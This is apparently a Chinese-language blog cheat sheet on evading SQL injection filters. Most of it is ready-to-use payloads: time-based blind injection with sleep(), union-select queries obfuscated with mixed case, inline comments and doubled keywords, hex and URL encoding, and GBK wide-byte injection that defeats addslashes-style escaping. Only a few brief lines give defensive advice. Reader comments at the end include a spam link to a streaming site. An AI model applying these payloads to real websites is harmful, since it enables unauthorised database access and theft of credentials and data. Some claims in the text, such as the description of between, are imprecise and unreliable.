sql注入常见注释及绕过
一、绕过空格(注释符/* */,%a0)
1.两个空格代替一个空格(双写)
2.%a0
=空格
3.最基本的绕过方法,用注释替换空格:/*注释/*
4.括号绕过空格
如果空格被过滤,括号没有被过滤,可以用括号绕过。
在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。
例如:time based盲注:
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
上面的方法既没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时。
二、引号绕过(使用十六进制)
会使用到引号的地方一般是在最后的where子句中。这个时候如果引号被过滤了,那么where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
几乎没有任何注入能过滤十六进制。
三、逗号绕过(使用from或者offset)
在使用盲注的时候,需要使用到substr()
,mid()
,limit
。这些子句方法都需要使用到逗号。
例如:
使用from to:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
使用join:
union select 1,2
union select * from (select 1)a join (select 2)b
使用like:
select ascii(mid(user(),1,1))=80 #等价于
select user() like 'r%'
使用offset来绕过limit中的",":
select * from news limit 0,1
select * from news limit 1 offset 0
四、比较符号(<>)绕过(过滤了<>:sqlmap盲注经常使用<>,使用between的脚本)
盲注的时候如果无法使用比较操作符,可使用greatest()
、least()
。(前者返回最大值,后者返回最小值)
select * from users where id=1 and ascii(substr(database(),0,1))>64
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
使用between and:
between a and b:返回a,b之间的数据,不包含b。
五、or and xor not绕过
and=&&
, or=||
, xor=|
, not=!
六、绕过注释符号(#,--(后面跟一个空格))过滤
id=1' union select 1,2,3||'1
最后的or '1闭合查询语句的最后的单引号,或者:
id=1' union select 1,2,'3
七、= 绕过
使用like 、rlike 、regexp(正则表达式) 或者 使用< 或者 >
八、绕过union,select,where等
1.使用注释符绕过:
常用注释符:
//
,--
, /**/
, #
, --+
, -- -
, ;
, %00
, --a
用法:
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user
2.使用大小写绕过:
id=-1'UnIoN/**/SeLeCT
3.内联注释绕过:
id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#
4. 双关键字绕过(若删除掉第一个匹配的union就能绕过):
id=-1'UNIunionONSeLselectECT1,2,3--
5.使用URLencode,ascii编码,
%53%45%4c%45%43%54(ascii)
6.函数或特殊符号
例如:表示admin,oracle中可以用 'adm'||'in'
, mysql中可以用 concat('adm','in')
; mssql中可以用:'adm'+'in'
九、通用绕过(编码)
如URLEncode编码,ASCII,HEX,unicode编码绕过:
如:urlencode: or 1=1即%6f%72%20%31%3d%31
ASCII : Test可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
十、等价函数绕过(不同数据库)
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
例如:substring()和substr()无法使用时:
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
或者:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
十二.宽字节注入
过滤'的时候往往利用的思路是将 ' 转换为 \' 。
在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:
(1)%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:
id=-1%df%27union select 1,user(),3--+
(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数:
1.replace():过滤 ' \ ,将 ' 转化为 \' ,将 \ 转为 \\,将 " 转为 \" 。用思路一。
2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:' , " , \ 。用思路一
(防御此漏洞,要将 mysql_query 设置为 binary 的方式)
3.mysql_real_escape_string():转义下列字符:
\x00 \n \r \ ' " \x1a
(防御,将mysql设置为gbk即可)
《名侦探柯南 VS. 怪盗基德PV》动画片高清在线免费观看:https://www.jgz518.com/xingkong/14148.html
不错不错,我喜欢看
大佬带带我
佬佬说笑了